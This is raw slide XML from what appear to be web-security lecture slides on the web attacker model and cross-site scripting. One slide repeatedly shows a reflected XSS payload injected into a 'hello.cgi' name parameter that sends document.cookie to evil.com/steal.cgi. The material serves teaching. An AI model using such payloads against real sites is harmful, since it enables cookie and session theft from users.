            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Tahoma" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>script runs as if it were loaded from the site that provided the page! </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Tahoma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54150" y="2667000"/>
            <a:ext cx="6242050" cy="1066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Aft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFontTx/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Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>&lt;script type="text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>"&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFontTx/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Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>="http://www.example.com/scripts/somescript.js"&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFontTx/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Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>&lt;/script&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1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A0DD50CE-80D9-F44E-9AD8-12E26E56BC76}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>34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575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Web Attacker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="굴림" charset="0"/>
              <a:cs typeface="굴림" charset="0"/>
            </a:endParaRP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953000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Controls malicious website (attacker.com)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Can even obtain SSL/TLS certificate for his site ($0)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>User visits attacker.com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF3399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>– why?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Phishing email, enticing content, search results, placed by ad network, blind luck …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Attacker has no other access to user machine!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Variation: gadget attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Bad gadget included in otherwise honest mashup (EvilMaps.com)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9AB91033-B01A-D144-A487-1AEE1902C0B2}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>35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3126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57416F0A-417C-B243-9C78-3C3DD64E0533}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="Arial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356600" cy="914400"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="92075" tIns="46038" rIns="92075" bIns="46038"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>XSS: Cross-Site Scripting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3733800" y="1584325"/>
            <a:ext cx="12604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lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>victim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s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1258501" name="Line 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="4800600" y="2422525"/>
            <a:ext cx="2819400" cy="3206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8502" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5638800" y="2362200"/>
            <a:ext cx="912813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endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea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57200" y="2438400"/>
            <a:ext cx="838200" cy="3794125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292100" y="1749425"/>
            <a:ext cx="12906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lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>evil.com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191000" y="2438400"/>
            <a:ext cx="609600" cy="3794125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7620000" y="2378075"/>
            <a:ext cx="838200" cy="3794125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95400" y="2895600"/>
            <a:ext cx="2895600" cy="381000"/>
            <a:chOff x="816" y="1824"/>
            <a:chExt cx="1824" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12322" name="Line 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="816" y="1920"/>
              <a:ext cx="1824" cy="1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Text Box 13"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1056" y="1824"/>
              <a:ext cx="1279" cy="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1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                  <a:ea typeface="+mn-ea"/>
                </a:rPr>
                <a:t>Access some web page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295400" y="3352800"/>
            <a:ext cx="2895600" cy="1230313"/>
            <a:chOff x="816" y="2112"/>
            <a:chExt cx="1824" cy="775"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12320" name="Line 15"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="816" y="2208"/>
              <a:ext cx="1824" cy="1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Text Box 16"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="912" y="2112"/>
              <a:ext cx="1584" cy="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buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>&lt;FRAME SRC=</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="70000"/>
                </a:lnSpc>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>http://naive.com/hello.cgi?</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="70000"/>
                </a:lnSpc>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>name=&lt;script&gt;win.open(</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="70000"/>
                </a:lnSpc>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="ja-JP" altLang="en-US" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>“</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>http://evil.com/steal.cgi?</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="70000"/>
                </a:lnSpc>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>cookie=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ja-JP" altLang="en-US" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>”</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>+document.cookie) </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="70000"/>
                </a:lnSpc>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>&lt;/script&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1258513" name="AutoShape 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1524000" y="4648200"/>
            <a:ext cx="2438400" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 21287"/>
              <a:gd name="adj2" fmla="val -88194"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg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accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Forces victim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s browser to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accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>call hello.cgi on naive.com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solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>with this script as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRP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800600" y="3505200"/>
            <a:ext cx="2819400" cy="846138"/>
            <a:chOff x="3024" y="2208"/>
            <a:chExt cx="1776" cy="533"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12318" name="Line 19"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3024" y="2304"/>
              <a:ext cx="1776" cy="1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Text Box 20"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3120" y="2208"/>
              <a:ext cx="1584" cy="5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buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>GET/ hello.cgi?</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>name=</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="70000"/>
                </a:lnSpc>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>&lt;script&gt;win.open(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ja-JP" altLang="en-US" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>“</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>http://</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="70000"/>
                </a:lnSpc>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>evil.com/steal.cgi?cookie</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ja-JP" altLang="en-US" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>”</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>+</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="70000"/>
                </a:lnSpc>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>document.cookie)&lt;/script&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1258517" name="Text Box 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7745413" y="3811588"/>
            <a:ext cx="1093787" cy="585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hello.cgi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executed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800600" y="4516438"/>
            <a:ext cx="2819400" cy="2036762"/>
            <a:chOff x="3024" y="2845"/>
            <a:chExt cx="1776" cy="1283"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12315" name="Line 23"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="3024" y="2976"/>
              <a:ext cx="1776" cy="20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Text Box 24"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3168" y="2845"/>
              <a:ext cx="1584" cy="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70000"/>
                </a:lnSpc>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>&lt;HTML&gt;Hello, dear</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="70000"/>
                </a:lnSpc>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>&lt;script&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>win.open(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ja-JP" altLang="en-US" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>“</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>http://</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="70000"/>
                </a:lnSpc>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>evil.com/steal.cgi?cookie=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ja-JP" altLang="en-US" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>”</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="70000"/>
                </a:lnSpc>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>+document.cookie)</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>&lt;/script&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="70000"/>
                </a:lnSpc>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Welcome!&lt;/HTML&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12317" name="AutoShape 25"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3281" y="3552"/>
              <a:ext cx="1375" cy="576"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 20546"/>
                <a:gd name="adj2" fmla="val -78819"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg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sz="1400">
                  <a:solidFill>
                    <a:schemeClr val="accent2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Interpreted as Javascript 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sz="1400">
                  <a:solidFill>
                    <a:schemeClr val="accent2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>by victim</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ja-JP" altLang="en-US" sz="1400">
                  <a:solidFill>
                    <a:schemeClr val="accent2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>’</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:solidFill>
                    <a:schemeClr val="accent2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>s browser; 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sz="1400">
                  <a:solidFill>
                    <a:schemeClr val="accent2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>opens window and calls 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sz="1400">
                  <a:solidFill>
                    <a:schemeClr val="accent2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>steal.cgi on evil.com</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1258522" name="Picture 26" descr="j02159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667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8523" name="Picture 27" descr="j02159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438400"/>
            <a:ext cx="3048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685800" y="5546725"/>
            <a:ext cx="3429000" cy="473075"/>
            <a:chOff x="432" y="3494"/>
            <a:chExt cx="2160" cy="298"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12311" name="Line 29"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="816" y="3494"/>
              <a:ext cx="1776" cy="20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Text Box 30"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="960" y="3504"/>
              <a:ext cx="1584" cy="1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buFontTx/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                  <a:ea typeface="+mn-ea"/>
                </a:rPr>
                <a:t>GET/ </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                  <a:ea typeface="+mn-ea"/>
                </a:rPr>
                <a:t>steal.cgi?cookie</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                  <a:ea typeface="+mn-ea"/>
                </a:rPr>
                <a:t>=</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="12313" name="Picture 31" descr="j021594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3520"/>
              <a:ext cx="19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4" name="Picture 32" descr="j021594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60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58529" name="AutoShape 33"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6551613" y="485775"/>
            <a:ext cx="2211387" cy="733425"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 28750"/>
              <a:gd name="adj2" fmla="val 254524"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3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rgbClr val="0D0D0D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Echoes user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="0D0D0D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="0D0D0D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s name: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rgbClr val="0D0D0D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;HTML&gt;Hello, dear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>
                <a:solidFill>
                  <a:srgbClr val="0D0D0D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/HTML&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12309" name="AutoShape 34"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7772400" y="2695575"/>
            <a:ext cx="1143000" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="foldedCorner">
            <a:avLst>
              <a:gd name="adj" fmla="val 28569"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="DDDDD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hello.cgi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12310" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
